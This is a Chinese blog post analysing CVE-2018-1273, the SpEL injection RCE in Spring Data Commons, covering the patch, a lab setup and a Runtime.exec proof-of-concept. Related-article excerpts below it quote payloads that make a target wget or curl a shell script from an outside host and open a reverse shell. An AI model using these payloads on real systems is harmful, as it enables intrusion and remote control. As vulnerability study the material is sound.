[CVE-2018-1273] Spring Data commons SpEL表达式注入RCE

最新推荐文章于 2024-07-17 15:49:08 发布
最新推荐文章于 2024-07-17 15:49:08 发布
阅读量687 收藏
点赞数
分类专栏: java 安全 Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/104950106
版权
安全 同时被 3 个专栏收录
264 篇文章 9 订阅
订阅专栏
Web
220 篇文章 7 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

漏洞简介

Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,包含Commons、Gemfire、JPA、JDBC、MongoDB等模块。此漏洞产生于Spring Data Commons组件。

参考:http://blog.nsfocus.net/cve-2018-1273-analysis/

官方通告:
https://tanzu.vmware.com/security/cve-2018-1273
提到了两个commit,都是在spring-data-commons-1.13.10.RELEASE.jar!\org\springframework\data\web\MapDataBinder#
通过补丁,知道补丁大致就是将StandardEvaluationContext替代为SimpleEvaluationContext,由于StandardEvaluationContext权限过大,可以执行任意代码,会被恶意用户利用。

SimpleEvaluationContext的权限则小的多,只支持一些map结构,通用的jang.lang.Runtime,java.lang.ProcessBuilder都已经不再支持,详情可查看SimpleEvaluationContext的实现。

环境搭建

环境搭建参考:
https://github.com/wearearima/poc-cve-2018-1273
直接在IDEA中打开,会自定将依赖的mvn库加入到依赖中。
点击右上角调试按钮即可进行调试。

SpelExpressionParser PARSER;

// 以下两种方式都可以造成RCE
Expression expression = PARSER.parseExpression("T(java.lang.Runtime).getRuntime().exec('calc')");expression.getValue(Class.class);
Expression expression = PARSER.parseExpression("T(java.lang.Runtime).getRuntime().exec('calc')");expression.setValue(context, "123");

静态代码审计规则可以放在getValuesetValue方法上。

参考

  • https://cws6.github.io/2019/02/27/SpEL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5/
  • http://rui0.cn/archives/1043
  • https://www.mi1k7ea.com/2020/01/10/SpEL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/
  • https://p0rz9.github.io/2019/05/28/SpEL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5/
caiqiiqi
关注
专栏目录
[Java安全]Spring Data CommonsCVE-2018-1273
snowlyzz的博客
02-08 699
CVE-2018-1273看漏洞分析
linux漏洞分析,Spring-data-commons(CVE-2018-1273)漏洞分析
weixin_39830303的博客
05-13 873
前言CVE-2018-1273Spring-data-commons近期爆出的一个可远程执行代码的漏洞,为了了解更多细节,本文将从漏洞的成因,漏洞的判定以及漏洞的利用三个方面来进行详细说明。漏洞的成因当用户在项目中利用了Spring-data的相关web特性对用户的输入参数进行自动匹配的时候,会将用户提交的form表单的key值作为Spel的执行内容,而这一步就是本次漏洞的爆发点。漏洞的判定...
春秋云镜 CVE-2018-1273
qq_22002773的博客
09-04 216
春秋云镜 CVE-2018-1273
spring 代码执行CVE-2018-1273
最新发布
qq_23003811的博客
07-17 333
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。5、打开vps服务器临时web服务器,这样就可以通过91.208.73.100:7777/shell.sh访问到我们制作好的文件。6、使用burp发送数据包,在被攻击的服务器上下载我们的shell。7、使用burp发送数据包,在被攻击的服务器上执行下载好的shell。4、在自己的vps服务器创一个shell.sh文件,内容为反弹连接。
spring:CVE-2018:1273
weixin_69670995的博客
05-18 502
使用浏览器访问users,并输入随便东西。在kali上使用vim新建测试txt文件。使用dirsearch工具进行目录扫描。使用python3开启临时http。修改payload,让靶机执行木马。修改payload,提升木马权限。发到重发器,并修改post传参。返回200,上传txt文件成功。修改paylaod,上传木马。执行成功,返回靶机shell。使用burp抓包,点击注册。返回200,上传成功。
漏洞复现之CVE-2018-1273 Spring Data Commons 远程命令执行
白帽子九一
04-27 1033
漏洞背景 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式执行任意命令。 实验环境 攻击机:Win 10 靶场:kali中搭建vulhub靶场 https://github.com/vulhub/vulhub/spring/CVE-2018-1273 影响版本 Sp
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
weixin_42786460的博客
09-16 408
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
CVE-2018-1270,CVE-2018-1273Spring Expression Language 漏洞分析
qq_22655689的博客
04-12 1463
0x00 背景     最近Spring框架不大太平,接连爆出来多个RCE远程代码执行CVE漏洞,其中有CVE-2018-1270,CVE-2018-1273,通过对造成漏洞部分代码进行分析,发现都是因为滥用SpEL的StandardEvaluationContext。   0x01 漏洞影响 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起...
CVE-2018-1273Spring Expression Language 漏洞分析
qq_22655689的博客
04-12 6453
0x00 背景 最近Spring框架不大太平,接连爆出来多个RCE远程代码执行CVE漏洞,其中有CVE-2018-1270,CVE-2018-1273,通过对造成漏洞部分代码进行分析,发现都是因为滥用SpEL的StandardEvaluationContext。 x01 漏洞影响 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。...
通过CVE-2021-43297漏洞在Apache Dubbo<=2.7.13下实现RCE
「 虚幻私塾」
01-21 1674
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 目录* 0 前言 1 找源头 1.1 找到触发点 1.2 可用的gadget 1.3 向上推触发点 2 构造poc 2.1 开启HttpServer 2.2 hessian2序列化过程简述 3 poc 4 总结 5 Dubbo<=2.7.13可用的POC
Spring Data Commons远程命令执行漏洞复现(CVE-2018-1273
wutiangui的博客
09-10 878
下载文件请求包:username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users,注册,BP抓包。在sh文件所在目录开启http服务。2.开启http服务。
001--什么是SpringData
weixin_42288943的博客
04-17 179
1.参考网址:https://blog.csdn.net/zgf19930504/article/details/50537198 2.核心内容: ** Spring Data **是Spring 的一个子项目, 旨在统一和简化对各类型持久化存储, 而不拘泥于是关系型数据库还是NoSQL 数据存储。无论是哪种持久化存储, 数据访问对象(或称作为DAO,...
Spring RCE漏洞分析2(CVE-2018-1273
hldfight
05-07 1998
0x00 前言 继续分析Spring的历史漏洞,本篇记录Spring Data Commons的远程代码执行漏洞(CVE-2018-1273)的分析。 0x01 环境搭建 使用的Spring Data Example Projects提供的示例代码。 但该项目中包含有15个子模块,如果将其整体导入IDEA,则需要下载所有模块中的依赖,显然这是没有必要的。通过参考这篇文章,发现只需导入web模块中的...
[春秋云镜]CVE-2018-1273
niubi707的博客
12-02 5361
[春秋云镜]CVE-2018-1273Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式执行任意命令。
Spring Data Commons 远程命令执行漏洞(CVE-2018-1273
EC_Carrot的博客
08-04 310
漏洞简介 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式执行任意命令。 漏洞复现 参考文章中的payload,在注册的时候抓包,并修改成如下数据包,即可运行命令: POST /users?page=&size=5 HTTP/1.1 Host: localh
CVE-2018-1273 Spring Data Commons 远程命令执行漏洞复现
weixin_44023403的博客
03-27 832
CVE-2018-1273 Spring Data Commons 远程命令执行漏洞复现前期准备一、漏洞复现二、总结 前期准备 工具:burpsuite、firefox浏览器 环境:kali 一、漏洞复现 (1)在Vulhub靶场部署好CVE-2018-1273漏洞(上一篇有写操作步骤),在浏览器节目打开http://ip:端口/users,在注册页面提交任意信息,用burp抓包; 找到我们提交的数据,之后发送到repeater进行修改数据包; 构造payload,修改数据包,创建文件,进行发包测试;
spring(CVE-2018-1273)远程代码执行漏洞复现
热门推荐
勤劳的码农的博客
03-12 1万+
Spring DataSpring框架中提供底层数据访问的项目模块,Spring Data Commons 是一个共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式,导致攻击者可以通过构造特殊的URL请求,造成服务端远程代码执行。在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式执行任意命令。Spring在补丁中使用更加安全的SimpleEvaluationContext替换了StandardEvaluationContext。
[Vulfocus解题系列]spring 代码执行CVE-2018-1273
00勇士王子的博客
01-05 3349
简介 Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。 复现过程 使用在线靶场 抓包 改包,将data数据改为下面的payload username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://m9c5f3.ceye.io/
SpringCloud Function SpEL注入漏洞详解 CVE-2022-22963
"SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963)" 本文将深入探讨SpringCloud Function中的一个安全问题,即Spring Expression Language (SpEL) 注入漏洞,该漏洞被追踪为CVE-2022-22963。SpringCloud ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值